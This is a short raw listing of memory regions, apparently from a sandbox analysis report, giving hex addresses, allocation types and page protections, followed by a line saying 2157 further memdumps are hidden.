7FFD9B764000
trusted library allocation
page read and write
1B32D3AF000
trusted library allocation
page read and write
1B32C930000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
F6C000
heap
page read and write
10016000
direct allocation
page execute and read and write
1AB89130000
heap
page execute and read and write
15BF8E80000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
B736C4C000
stack
page read and write
15B80CAA000
trusted library allocation
page read and write
1B32D23D000
trusted library allocation
page read and write
2D4D4DC6000
trusted library allocation
page read and write
1B32D3FA000
trusted library allocation
page read and write
7FFD9BAA3000
trusted library allocation
page read and write
1E3B0ED1000
trusted library allocation
page read and write
15BDC7E000
stack
page read and write
1B32D3B7000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
There are 2157 hidden memdumps, click here to show them.